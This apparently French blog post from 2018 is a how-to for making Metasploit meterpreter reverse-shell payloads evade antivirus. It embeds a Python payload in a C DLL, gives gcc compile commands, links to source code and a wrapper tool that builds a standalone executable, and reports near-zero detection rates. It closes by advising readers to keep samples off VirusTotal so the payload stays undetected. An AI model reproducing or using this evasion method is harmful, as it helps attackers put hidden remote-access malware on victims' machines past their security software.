How I found a way to evade all antivirus products

Hello readers ! 
These days I was interested about AV evasion and I learned so much about how antivirus software work and here I will write about my technique to evade every AV product  .
Many People using Windows think that an Antivirus can stop any Threat and with a AV installed their computer will be secured . This idea is false because advanced Malwares are created everyday without be detected by any Antivirus .

Slow-AV-Scans.jpg

How An Antivirus work ?

An AV has two scanning technique :

– Static analysis also called ‘signature-based analysis’ : The Antivirus product compare the md5/sha1 signature of potential threat with the signature of known malware , and if the signature of program scanned matches with those of known malwares then the program is moved to the quarantine of AV .

– Dynamic analysis also called ‘Runtime analysis’ : Once program executed if he’s not detected by signature , The Antivirus will try to detect malicious actions like decrypting payload in memory and plenty others .

An another type of protection is AV sandbox : when a file is suspected by user to be a malware he can be launched in AV sandbox without internet and without some resources an sandbox is like a docker container in linux , the sandbox can run a file without ‘infecting’ the real system .

What you will need to follow this writeup ?

– A main OS with Metasploit framework installed .
– A Windows virtual machine with an Antivirus software installed ( mine is Kaspersky free 2016 ) and mingw with gcc.exe and Python 2.7 .
In this writeup I will use Metasploit payloads as testing executables to evade AV .

Msfvenom

Msfvenom is the payload generator of Metasploit’s framework , payloads generated by msfvenom are standalone and they are quite good for Pentesting but they are detected by most of AV products ( See the results from a Online AV scanner with a simple meterpreter reverse shell payload ) .

Capture d'écran 2018-01-03 15:25:41

My idea about Antivirus evasion

I have tried many techniques to obtain a FUD executable but none of them worked :

– Writting an metasploit payload encoder in ruby to obfucate the malicious code of the Payload . After some research I realised that the utility of an MSF encoder is to escape bad characters like x00 not to evade AV software .
– Generating the payload in a interpreted language format (like .py .vbs .pl ) then compile it to executable .

Finally , I have a great idea : Since Metasploit python meterpreter payloads I wanted to embed the python payload In C program with Python developpement libraries like Python.h then compile it into an Windows Executable . With this technique I got 1/37 with Nodistribute Online scanner .
I wanted a Fully undetectable result so I tried to create an Malicious Dynamic Library with the Python Payload embedded and finally got an Fully Undetectable payload 🙂 Capture d'écran 2018-01-05 21:34:44

We can check exported functions from the Malicious dynamic library I’ve created !Capture d'écran 2018-01-05 22:51:49.png

We run the malicious function of the DLL !

Capture d'écran 2018-01-05 22:58:38

And BOOM we got a meterpreter session in our side 🙂 !
Capture d'écran 2018-01-05 23:02:47

How to create a DLL with python payload embedded ?

Here You can get the C source code of DLL https://pastebin.com/Q5ipn81s , To compile the DLL you need Python Developpement Libraries you also need libpython27.a (the static library who embed the python interpreter in the executable ) http://www58.zippyshare.com/v/pzoNUkGd/file.html and move it in C:\Python27\libs\

Compilation :

gcc.exe malicious_dll.c -IC:\Python27\include -LC:\Python27\libs -lpython27 -shared -o payload.dll

-shared = tell to gcc that the output will be an dynamic library
-I = tell to gcc where Python.h is located
-o = the output
-L = tell to gcc where the python interpreter library is located
-l = the name of python interpreter lib (libpython27.a)

Portability Problem

We got our malicious dynamic library but the problem is how we can distibute it during an Pentest for example we will need a bat file or an exe to call the malicious dll so how can we distribute the two files ?

To resolve the Problem , I created a Python Program who will hardcode the bytes of the dll in a character variable then write them in a new dll then call the function of dll , so the payload will be standalone : https://github.com/Hadi999/MyTools/blob/master/bypass-av.py !

Capture d'écran 2018-01-06 15:09:25.png

In our case we need to call the function ‘payload’ of payload.dll so the command will be
python bypass-av.py --library=payload.dll --function=payload --output=standalone_payload.c

we compile it in our Windows machine :
gcc.exe standalone_payload.c -o standalone_payload.exe

Capture d'écran 2018-01-06 16:25:40

Arghhh 1/38 for our standalone executable , but the only AV who detect it is Clamav who is an Unix Antivirus : our payload is for Windows so our Executable is Fully Undetectable !!! If you want an 0/37 you can distribute only the malicious dll and a batch file who call it . Its the end of the article I hope you liked it 🙂

Note: Please do not scan the samples with Online Scanner like Virustotal because they share results to AV and our Payload will not be FUD anymore .

Publicités

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion /  Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s